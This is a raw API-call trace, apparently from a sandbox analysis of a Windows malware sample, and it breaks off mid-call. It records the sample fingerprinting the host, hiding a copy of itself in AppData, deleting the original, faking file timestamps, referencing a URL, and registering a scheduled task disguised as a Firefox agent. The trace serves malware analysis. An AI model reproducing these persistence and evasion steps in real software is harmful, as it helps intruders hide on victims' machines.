Sleep (dwMilliseconds=0xa) [0153.139] Sleep (dwMilliseconds=0xa) [0153.212] Sleep (dwMilliseconds=0xa) [0153.230] Sleep (dwMilliseconds=0xa) [0153.240] Sleep (dwMilliseconds=0xa) [0153.273] Sleep (dwMilliseconds=0xa) [0153.284] Sleep (dwMilliseconds=0xa) [0153.295] Sleep (dwMilliseconds=0xa) [0153.306] Sleep (dwMilliseconds=0xa) [0153.317] Sleep (dwMilliseconds=0xa) [0153.328] Sleep (dwMilliseconds=0xa) [0153.342] Sleep (dwMilliseconds=0xa) [0153.432] Sleep (dwMilliseconds=0xa) [0153.505] Sleep (dwMilliseconds=0xa) [0153.570] Sleep (dwMilliseconds=0xa) [0153.598] Sleep (dwMilliseconds=0xa) [0153.687] Sleep (dwMilliseconds=0xa) [0153.842] Sleep (dwMilliseconds=0xa) [0153.853] Sleep (dwMilliseconds=0xa) [0153.863] Sleep (dwMilliseconds=0xa) [0153.878] Sleep (dwMilliseconds=0xa) [0153.912] Sleep (dwMilliseconds=0xa) [0153.922] Sleep (dwMilliseconds=0xa) [0153.942] Sleep (dwMilliseconds=0xa) [0153.954] Sleep (dwMilliseconds=0xa) [0153.965] Sleep (dwMilliseconds=0xa) [0153.976] Sleep (dwMilliseconds=0xa) [0154.064] Sleep (dwMilliseconds=0xa) [0154.075] Sleep (dwMilliseconds=0xa) [0154.086] Sleep (dwMilliseconds=0xa) [0154.097] Sleep (dwMilliseconds=0xa) [0154.108] Sleep (dwMilliseconds=0xa) [0154.119] Sleep (dwMilliseconds=0xa) [0154.215] Sleep (dwMilliseconds=0xa) [0154.528] Sleep (dwMilliseconds=0xa) [0154.742] Sleep (dwMilliseconds=0xa) [0154.795] Sleep (dwMilliseconds=0xa) [0154.807] Sleep (dwMilliseconds=0xa) [0154.817] Sleep (dwMilliseconds=0xa) [0154.828] Sleep (dwMilliseconds=0xa) [0154.840] Sleep (dwMilliseconds=0xa) [0154.851] Sleep (dwMilliseconds=0xa) [0154.862] Sleep (dwMilliseconds=0xa) [0154.872] Sleep (dwMilliseconds=0xa) [0154.955] Sleep (dwMilliseconds=0xa) [0154.987] Sleep (dwMilliseconds=0xa) [0154.998] Sleep (dwMilliseconds=0xa) [0155.009] Sleep (dwMilliseconds=0xa) [0155.020] Sleep (dwMilliseconds=0xa) [0155.031] Sleep (dwMilliseconds=0xa) [0155.042] Sleep (dwMilliseconds=0xa) [0155.052] Sleep (dwMilliseconds=0xa) [0155.090] Sleep (dwMilliseconds=0xa) [0155.101] Sleep (dwMilliseconds=0xa) [0155.112] Sleep (dwMilliseconds=0xa) [0155.200] Sleep (dwMilliseconds=0xa) [0155.210] Sleep (dwMilliseconds=0xa) [0155.291] Sleep (dwMilliseconds=0xa) [0155.348] Sleep (dwMilliseconds=0xa) [0155.409] Sleep (dwMilliseconds=0xa) [0155.467] Sleep (dwMilliseconds=0xa) [0155.488] Sleep (dwMilliseconds=0xa) [0155.499] Sleep (dwMilliseconds=0xa) [0155.515] Sleep (dwMilliseconds=0xa) [0155.525] Sleep (dwMilliseconds=0xa) [0155.536] Sleep (dwMilliseconds=0xa) [0155.548] Sleep (dwMilliseconds=0xa) [0155.559] Sleep (dwMilliseconds=0xa) [0155.660] Sleep (dwMilliseconds=0xa) [0155.726] Sleep (dwMilliseconds=0xa) [0155.736] Sleep (dwMilliseconds=0xa) [0155.747] Sleep (dwMilliseconds=0xa) [0155.758] Sleep (dwMilliseconds=0xa) [0155.768] Sleep (dwMilliseconds=0xa) [0155.784] Sleep (dwMilliseconds=0xa) [0155.795] Sleep (dwMilliseconds=0xa) [0155.806] Sleep (dwMilliseconds=0xa) [0155.945] Sleep (dwMilliseconds=0xa) [0156.034] Sleep (dwMilliseconds=0xa) [0156.123] Sleep (dwMilliseconds=0xa) [0156.175] Sleep (dwMilliseconds=0xa) [0156.215] Sleep (dwMilliseconds=0xa) [0156.225] Sleep (dwMilliseconds=0xa) [0156.236] Sleep (dwMilliseconds=0xa) [0156.246] Sleep (dwMilliseconds=0xa) [0156.259] Sleep (dwMilliseconds=0xa) [0156.270] Sleep (dwMilliseconds=0xa) [0156.415] Sleep (dwMilliseconds=0xa) [0156.497] Sleep (dwMilliseconds=0xa) [0156.528] Sleep (dwMilliseconds=0xa) [0156.552] Sleep (dwMilliseconds=0xa) [0156.562] Sleep (dwMilliseconds=0xa) [0156.572] Sleep (dwMilliseconds=0xa) [0156.594] Sleep (dwMilliseconds=0xa) [0156.605] Sleep (dwMilliseconds=0xa) [0156.615] Sleep (dwMilliseconds=0xa) [0156.626] Sleep (dwMilliseconds=0xa) [0156.716] Sleep (dwMilliseconds=0xa) [0156.727] Sleep (dwMilliseconds=0xa) [0156.737] Sleep (dwMilliseconds=0xa) [0156.761] Sleep (dwMilliseconds=0xa) [0156.772] Sleep (dwMilliseconds=0xa) [0156.783] Sleep (dwMilliseconds=0xa) [0156.793] Sleep (dwMilliseconds=0xa) [0156.804] Sleep (dwMilliseconds=0xa) [0156.843] Sleep (dwMilliseconds=0xa) [0156.856] Sleep (dwMilliseconds=0xa) [0157.045] Sleep (dwMilliseconds=0xa) [0157.115] Sleep (dwMilliseconds=0xa) [0157.137] Sleep (dwMilliseconds=0xa) [0157.214] GetSystemDirectoryA (in: lpBuffer=0xfc4fde0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.214] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe" [0157.215] RtlGetVersion (in: lpVersionInformation=0x410457 | out: lpVersionInformation=0x410457*(dwOSVersionInfoSize=0x0, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0157.216] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0xfc4fdc8 | out: TokenHandle=0xfc4fdc8*=0x2240) returned 1 [0157.216] GetTokenInformation (in: TokenHandle=0x2240, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfc4fdc0 | out: TokenInformation=0x0, ReturnLength=0xfc4fdc0) returned 0 [0157.216] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x25) returned 0x9210830 [0157.216] GetTokenInformation (in: TokenHandle=0x2240, TokenInformationClass=0x19, TokenInformation=0x9210830, TokenInformationLength=0x1c, ReturnLength=0xfc4fdc0 | out: TokenInformation=0x9210830, ReturnLength=0xfc4fdc0) returned 1 [0157.216] GetSidSubAuthorityCount (pSid=0x9210840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x9210841 [0157.216] GetSidSubAuthority (pSid=0x9210840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x9210848 [0157.216] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210830) returned 0x25 [0157.216] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210830) returned 1 [0157.217] CloseHandle (hObject=0x2240) returned 1 [0157.217] GetComputerNameA (in: lpBuffer=0xfc4fe90, nSize=0xfc4fed0 | out: lpBuffer="XC64ZB", nSize=0xfc4fed0) returned 1 [0157.217] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0xfc4fec0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xfc4fec0*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0157.217] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x29) returned 0x9210830 [0157.217] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x14) returned 0x9210870 [0157.217] wsprintfA (in: param_1=0x9210830, param_2="%s%08X%08X" | out: param_1="XC64ZB99FC78690C287F38") returned 22 [0157.219] CryptAcquireContextA (in: phProv=0xfc4fe18, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xfc4fe18*=0x4a6f150) returned 1 [0157.241] CryptCreateHash (in: hProv=0x4a6f150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xfc4fe10 | out: phHash=0xfc4fe10) returned 1 [0157.241] lstrlenA (lpString="XC64ZB99FC78690C287F38") returned 22 [0157.241] CryptHashData (hHash=0x8505fa0, pbData=0x9210830, dwDataLen=0x16, dwFlags=0x0) returned 1 [0157.241] CryptGetHashParam (in: hHash=0x8505fa0, dwParam=0x2, pbData=0xfc4fe20, pdwDataLen=0xfc4fe50, dwFlags=0x0 | out: pbData=0xfc4fe20, pdwDataLen=0xfc4fe50) returned 1 [0157.241] wsprintfA (in: param_1=0x41020c, param_2="%02X" | out: param_1="FE") returned 2 [0157.241] wsprintfA (in: param_1=0x41020e, param_2="%02X" | out: param_1="7F") returned 2 [0157.241] wsprintfA (in: param_1=0x410210, param_2="%02X" | out: param_1="15") returned 2 [0157.241] wsprintfA (in: param_1=0x410212, param_2="%02X" | out: param_1="06") returned 2 [0157.241] wsprintfA (in: param_1=0x410214, param_2="%02X" | out: param_1="0B") returned 2 [0157.241] wsprintfA (in: param_1=0x410216, param_2="%02X" | out: param_1="87") returned 2 [0157.242] wsprintfA (in: param_1=0x410218, param_2="%02X" | out: param_1="5F") returned 2 [0157.242] wsprintfA (in: param_1=0x41021a, param_2="%02X" | out: param_1="B9") returned 2 [0157.242] wsprintfA (in: param_1=0x41021c, param_2="%02X" | out: param_1="FB") returned 2 [0157.242] wsprintfA (in: param_1=0x41021e, param_2="%02X" | out: param_1="2A") returned 2 [0157.242] wsprintfA (in: param_1=0x410220, param_2="%02X" | out: param_1="49") returned 2 [0157.242] wsprintfA (in: param_1=0x410222, param_2="%02X" | out: param_1="F0") returned 2 [0157.242] wsprintfA (in: param_1=0x410224, param_2="%02X" | out: param_1="8D") returned 2 [0157.242] wsprintfA (in: param_1=0x410226, param_2="%02X" | out: param_1="5D") returned 2 [0157.242] wsprintfA (in: param_1=0x410228, param_2="%02X" | out: param_1="03") returned 2 [0157.242] wsprintfA (in: param_1=0x41022a, param_2="%02X" | out: param_1="12") returned 2 [0157.242] CryptDestroyHash (hHash=0x8505fa0) returned 1 [0157.242] CryptReleaseContext (hProv=0x4a6f150, dwFlags=0x0) returned 1 [0157.242] wsprintfA (in: param_1=0x41022c, param_2="%08X" | out: param_1="0C287F38") returned 8 [0157.242] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210870) returned 0x14 [0157.242] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210870) returned 1 [0157.242] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210830) returned 0x29 [0157.243] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210830) returned 1 [0157.243] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0xe) returned 0x9210830 [0157.243] wsprintfA (in: param_1=0x410dbe, param_2="%sFF" | out: param_1="FE7F15060B875FB9FB2A49F08D5D03120C287F38FF") returned 42 [0157.243] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210830) returned 0xe [0157.243] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210830) returned 1 [0157.243] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned 0x2240 [0157.243] RtlGetLastWin32Error () returned 0x0 [0157.244] GetTickCount () returned 0x1aecd37 [0157.244] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x1008) returned 0x9210830 [0157.244] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x2e) returned 0x9211840 [0157.244] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xfc4fed8 | out: phkResult=0xfc4fed8*=0x2194) returned 0x0 [0157.244] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x14) returned 0x9211880 [0157.244] RegQueryValueExA (in: hKey=0x2194, lpValueName="svcVersion", lpReserved=0x0, lpType=0x0, lpData=0xfc4fe60, lpcbData=0xfc4fec0*=0x20 | out: lpType=0x0, lpData=0xfc4fe60*=0x31, lpcbData=0xfc4fec0*=0xd) returned 0x0 [0157.244] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211880) returned 0x14 [0157.244] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211880) returned 1 [0157.244] lstrlenA (lpString="11.0.10586.0") returned 12 [0157.244] lstrlenA (lpString=".") returned 1 [0157.244] atoi (_Str="11") returned 11 [0157.244] RegCloseKey (hKey=0x2194) returned 0x0 [0157.244] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211840) returned 0x2e [0157.245] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211840) returned 1 [0157.245] ObtainUserAgentString (in: dwOption=0xb, pszUAOut=0x9210830, cbSize=0xfc4fec0 | out: pszUAOut="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", cbSize=0xfc4fec0) returned 0x0 [0157.382] lstrlenA (lpString="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko") returned 74 [0157.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9210830, cbMultiByte=75, lpWideCharStr=0x410577, cchWideChar=150 | out: lpWideCharStr="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko") returned 75 [0157.382] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210830) returned 0x1008 [0157.383] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210830) returned 1 [0157.383] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x1008) returned 0x9210830 [0157.383] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x1c) returned 0x9211840 [0157.383] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x9210830, nSize=0x105 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x26 [0157.383] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211840) returned 0x1c [0157.383] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211840) returned 1 [0157.383] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x16) returned 0x9211840 [0157.383] wsprintfW (in: param_1=0x4107a6, param_2="%s\\%hs" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 45 [0157.384] wsprintfW (in: param_1=0x410bb6, param_2="%s\\%hs" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa") returned 45 [0157.384] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211840) returned 0x16 [0157.384] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211840) returned 1 [0157.384] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x26) returned 0x9211840 [0157.384] lstrlenA (lpString="http://file-coin-host-12.com/") returned 29 [0157.384] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x9211840, Length=0x1d) returned 0x57488b3e [0157.384] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211840) returned 0x26 [0157.384] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211840) returned 1 [0157.385] lstrcmpW (lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 1 [0157.385] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0 [0157.385] CopyFileW (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), bFailIfExists=0) returned 1 [0158.301] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe")) returned 1 [0158.308] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x12) returned 0x9211840 [0158.308] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x2a) returned 0x9211860 [0158.308] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x408) returned 0x92118a0 [0158.308] wsprintfW (in: param_1=0x92118a0, param_2="%s%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih:Zone.Identifier") returned 61 [0158.308] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih:Zone.Identifier" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih:zone.identifier")) returned 0 [0158.309] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x92118a0) returned 0x408 [0158.309] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x92118a0) returned 1 [0158.309] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211840) returned 0x12 [0158.309] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211840) returned 1 [0158.309] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211860) returned 0x2a [0158.310] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211860) returned 1 [0158.310] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x16) returned 0x9211840 [0158.310] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x210) returned 0x9211860 [0158.310] GetSystemDirectoryA (in: lpBuffer=0x9211860, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.310] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0158.310] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2="advapi32.dll" | out: lpString1="C:\\Windows\\system32\\advapi32.dll") returned="C:\\Windows\\system32\\advapi32.dll" [0158.310] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwFileAttributes=0x6) returned 1 [0158.311] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x2230 [0158.311] GetFileAttributesExA (in: lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), fInfoLevelId=0x0, lpFileInformation=0xfc4fe30 | out: lpFileInformation=0xfc4fe30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a16bf4b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a16bf4b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a16bf4b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa3ef0)) returned 1 [0158.311] SetFileTime (hFile=0x2230, lpCreationTime=0xfc4fe34, lpLastAccessTime=0xfc4fe3c, lpLastWriteTime=0xfc4fe44) returned 1 [0158.311] CloseHandle (hObject=0x2230) returned 1 [0158.311] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211860) returned 0x210 [0158.312] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211860) returned 1 [0158.312] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211840) returned 0x16 [0158.312] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211840) returned 1 [0158.312] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x418) returned 0x9211840 [0158.312] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" [0158.312] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x212) returned 0x9211c60 [0158.312] GetUserNameW (in: lpBuffer=0x9211c60, pcbBuffer=0xfc4fe70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0xfc4fe70) returned 1 [0158.316] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x10d) returned 0x9211e80 [0158.316] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x4c) returned 0x9211fa0 [0158.316] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x10d) returned 0x9212000 [0158.317] wsprintfW (in: param_1=0x9211e80, param_2="Firefox Default Browser Agent %hs" | out: param_1="Firefox Default Browser Agent FE7F15060B875FB9") returned 46 [0158.317] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9212000) returned 0x10d [0158.317] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9212000) returned 1 [0158.317] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211fa0) returned 0x4c [0158.317] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211fa0) returned 1 [0158.317] CoCreateInstance (in: rclsid=0x421010*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x421000*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xfc4fd08 | out: ppv=0xfc4fd08*=0x3d51fc0) returned 0x0 [0158.804] TaskScheduler:ITaskService:Connect (This=0x3d51fc0, serverName=0xfc4fd80*(varType=0x0, wReserved1=0x921, wReserved2=0x0, wReserved3=0x0, varVal1=0x425257, varVal2=0x4107a6), user=0xfc4fda0*(varType=0x0, wReserved1=0x921, wReserved2=0x0, wReserved3=0x0, varVal1=0x425257, varVal2=0x4107a6), domain=0xfc4fd60*(varType=0x0, wReserved1=0x921, wReserved2=0x0, wReserved3=0x0, varVal1=0x425257, varVal2=0x4107a6), password=0xfc4fde0*(varType=0x0, wReserved1=0x921, wReserved2=0x0, wReserved3=0x0, varVal1=0x425257, varVal2=0x4107a6)) returned 0x0 [0158.809] TaskScheduler:ITaskService:GetFolder (in: This=0x3d51fc0, Path="", ppFolder=0xfc4fd28 | out: ppFolder=0xfc4fd28*=0x3d4d220) returned 0x0 [0158.811] ITaskFolder:DeleteTask (This=0x3d4d220, Name="Firefox Default Browser Agent FE7F15060B875FB9", flags=0) returned 0x80070002 [0158.812] TaskScheduler:ITaskService:NewTask (in: This=0x3d51fc0, flags=0x0, ppDefinition=0xfc4fe40 | out: ppDefinition=0xfc4fe40*=0x3d026e0) returned 0x0 [0158.813] ITaskDefinition:get_RegistrationInfo (in: This=0x3d026e0, ppRegistrationInfo=0xfc4fd40 | out: ppRegistrationInfo=0xfc4fd40*=0x3cedd20) returned 0x0 [0158.813] IRegistrationInfo:put_Author (This=0x3cedd20, Author="RDhJ0CNFevzX") returned 0x0 [0158.813] IUnknown:Release (This=0x3cedd20) returned 0x1 [0158.813] ITaskDefinition:get_Settings (in: This=0x3d026e0, ppSettings=0xfc4fd18 | out: ppSettings=0xfc4fd18*=0x3cedae0) returned 0x0 [0158.814] ITaskSettings:put_StartWhenAvailable (This=0x3cedae0, StartWhenAvailable=1) returned 0x0 [0158.814] IUnknown:Release (This=0x3cedae0) returned 0x3 [0158.814] ITaskDefinition:get_Triggers (in: This=0x3d026e0, ppTriggers=0xfc4fd20 | out: ppTriggers=0xfc4fd20*=0x3ce4be0) returned 0x0 [0158.814] ITriggerCollection:Create (in: This=0x3ce4be0, Type=1, ppTrigger=0xfc4fe30 | out: ppTrigger=0xfc4fe30*=0x3d04420) returned 0x0 [0158.814] IUnknown:QueryInterface (in: This=0x3d04420, riid=0x421030*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0xfc4fd10 | out: ppvObject=0xfc4fd10*=0x3d04420) returned 0x0 [0158.814] ITrigger:get_Repetition (in: This=0x3d04420, ppRepeat=0xfc4fd00 | out: ppRepeat=0xfc4fd00*=0x3d55f50) returned 0x0 [0158.814] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x14) returned 0x9211fa0 [0158.815] IRepetitionPattern:put_Interval (This=0x3d55f50, Interval="PT10M") returned 0x0 [0158.815] ITrigger:put_Repetition (This=0x3d04420, Repetition=0x3d55f50) returned 0x0 [0158.815] IUnknown:Release (This=0x3d55f50) returned 0x1 [0158.815] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x30) returned 0x9211fc0 [0158.815] ITrigger:put_StartBoundary (This=0x3d04420, StartBoundary="1999-11-30T00:00:00") returned 0x0 [0158.815] IUnknown:Release (This=0x3d04420) returned 0x2 [0158.815] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211fc0) returned 0x30 [0158.816] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211fc0) returned 1 [0158.816] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211fa0) returned 0x14 [0158.816] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211fa0) returned 1 [0158.816] IUnknown:Release (This=0x3d04420) returned 0x1 [0158.816] ITriggerCollection:Create (in: This=0x3ce4be0, Type=9, ppTrigger=0xfc4fe30 | out: ppTrigger=0xfc4fe30*=0x3cfc820) returned 0x0 [0158.817] IUnknown:QueryInterface (in: This=0x3cfc820, riid=0x421020*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0xfc4fd00 | out: ppvObject=0xfc4fd00*=0x3cfc820) returned 0x0 [0158.817] ILogonTrigger:put_UserId (This=0x3cfc820, UserId="RDhJ0CNFevzX") returned 0x0 [0158.822] IUnknown:Release (This=0x3cfc820) returned 0x2 [0158.822] IUnknown:Release (This=0x3cfc820) returned 0x1 [0158.822] ITaskDefinition:get_Actions (in: This=0x3d026e0, ppActions=0xfc4fd30 | out: ppActions=0xfc4fd30*=0x3d4d0a0) returned 0x0 [0158.822] IActionCollection:Create (in: This=0x3d4d0a0, Type=0, ppAction=0xfc4fd48 | out: ppAction=0xfc4fd48*=0x3ce49b0) returned 0x0 [0158.822] IUnknown:Release (This=0x3d4d0a0) returned 0x1 [0158.822] IUnknown:QueryInterface (in: This=0x3ce49b0, riid=0x421040*(Data1=0x4c3d624d, 